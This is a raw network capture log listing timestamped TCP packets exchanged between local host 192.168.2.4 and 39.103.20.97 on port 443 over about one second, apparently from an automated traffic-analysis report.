Jan 1, 2025 08:30:43.556066990 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.556140900 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.556169033 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.556183100 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.556189060 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.556216955 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.556226015 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.556257963 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.556303024 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.556332111 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.556376934 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.556427956 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.556468010 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.556616068 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.556658030 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.556672096 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.556675911 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.556689978 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.556690931 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.556720972 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.556725979 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.556731939 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.556761026 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.556814909 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.556859016 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.586003065 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.601528883 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.647089005 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.647124052 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.647156954 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.647165060 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.647176027 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.647208929 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.647241116 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.647286892 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.647289991 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.647299051 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.647339106 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.647339106 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.647347927 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.647386074 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.647428989 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.647469044 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.647476912 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.647480965 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.647505999 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.647516966 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.647521019 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.647537947 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.647548914 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.647553921 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.647578001 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.647680044 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.647712946 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.647726059 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.647731066 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.647757053 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.647778988 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.647789001 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.647821903 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.647828102 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.647831917 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.647859097 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.647872925 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.647882938 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.647923946 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.648087978 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.648154020 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.648180008 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.648217916 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.648225069 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.648228884 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.648248911 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.648262978 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.648267031 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.648277044 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.648296118 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.648302078 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.648319006 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.648323059 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.648358107 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.648591995 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.648638010 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.648653984 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.648653984 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.648663044 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.648680925 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.648691893 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.648699999 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.648705959 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.648729086 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.648735046 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.648744106 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.648746967 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.648761988 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.648762941 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.648792982 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.648814917 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.648819923 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.648845911 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.648858070 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.648859978 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.648866892 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.648894072 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.648911953 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.649058104 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.649091005 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.649110079 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.649115086 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.649127960 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.649144888 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.649158955 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.649164915 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.649168968 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.649199963 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.649209976 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.676944017 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.741425991 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.741488934 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.741525888 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.741555929 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.741565943 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.741570950 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.741590023 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.741609097 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.741672993 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.741714954 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.741853952 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.741883993 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.741904020 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.741909027 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.741931915 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.742001057 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.742032051 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.742033958 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.742039919 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.742053032 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.742079020 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.742198944 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.742238045 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.742356062 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.742399931 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.742409945 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.742413998 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.742436886 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.742479086 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.742556095 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.742592096 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.742599010 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.742603064 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.742630005 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.742641926 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.742707014 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.742754936 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.742866993 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.742896080 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.742907047 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.742912054 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.742940903 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.742947102 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.743045092 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.743087053 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.743211985 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.743242025 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.743251085 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.743254900 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.743280888 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.743295908 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.743424892 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.743467093 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.743578911 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.743606091 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.743616104 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.743619919 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.743640900 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.743654013 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.743738890 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.743776083 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.743777037 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.743782997 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.743824959 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.743928909 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.743957043 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.743968964 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.743973017 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.743995905 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.744044065 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.744096041 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.744138956 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.744335890 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.744370937 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.744376898 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.744380951 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.744410992 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.744419098 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.744465113 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.744507074 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.744563103 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.744623899 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.744652033 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.744668007 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.744673014 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.744688988 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.744926929 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.831986904 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.832042933 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.832048893 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.832056999 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.832101107 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.832137108 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.832165003 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.832180977 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.832185030 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.832205057 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.832221031 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.832268953 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.832298994 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.832309008 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.832312107 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.832334042 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.832350016 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.832405090 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.832437038 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.832448959 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.832453012 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.832478046 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.832479954 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.832492113 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.832499981 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.832520962 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.832539082 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.832545042 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.832549095 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.832585096 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.832622051 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.832659006 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.832664967 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.832669020 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.832695007 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.832701921 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.832727909 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.832731962 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.832748890 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.832776070 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.833029985 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.833069086 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.833079100 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.833082914 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.833102942 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.833105087 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.833142996 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.833143950 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.833152056 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.833183050 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.833184958 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.833190918 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.833221912 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.833251953 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.833286047 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.833292007 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.833296061 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.833319902 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.833323002 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.833338976 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.833343029 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.833352089 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.833370924 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.833396912 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.833400965 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.833436966 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.833482981 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.833513975 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.833525896 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.833529949 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.833554029 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.833566904 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.833709955 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.833745956 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.833760977 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.833764076 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.833775997 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.833786964 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.833810091 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.833811045 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.833820105 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.833832026 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.833863974 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.834028006 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.834062099 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.834072113 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.834074974 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.834094048 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.834100008 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.834120035 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.834122896 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.834147930 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.834153891 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.834170103 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.834196091 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.955627918 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.955641031 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.955660105 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.955670118 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.955749035 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.955756903 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.955765963 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.955854893 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:43.955861092 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.955872059 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:43.955945015 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:44.167330980 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:44.167376041 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:44.168092966 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:44.168111086 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:44.168135881 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:44.168190002 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:44.168209076 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:44.168235064 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:44.168246031 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:44.168289900 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:44.168306112 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:44.168330908 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:44.168354034 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:44.168365955 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:44.168395042 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:44.168406963 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:44.168431997 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:44.168456078 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:44.168467045 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:44.168494940 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:44.168508053 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:44.168529034 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:44.168565035 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:44.379321098 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:44.379368067 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:44.404755116 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:44.404762030 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:44.404788971 CET	443	49740	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:44.404834986 CET	49740	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:44.404841900 CET	443	49740	39.103.20.97	192.168.2.4
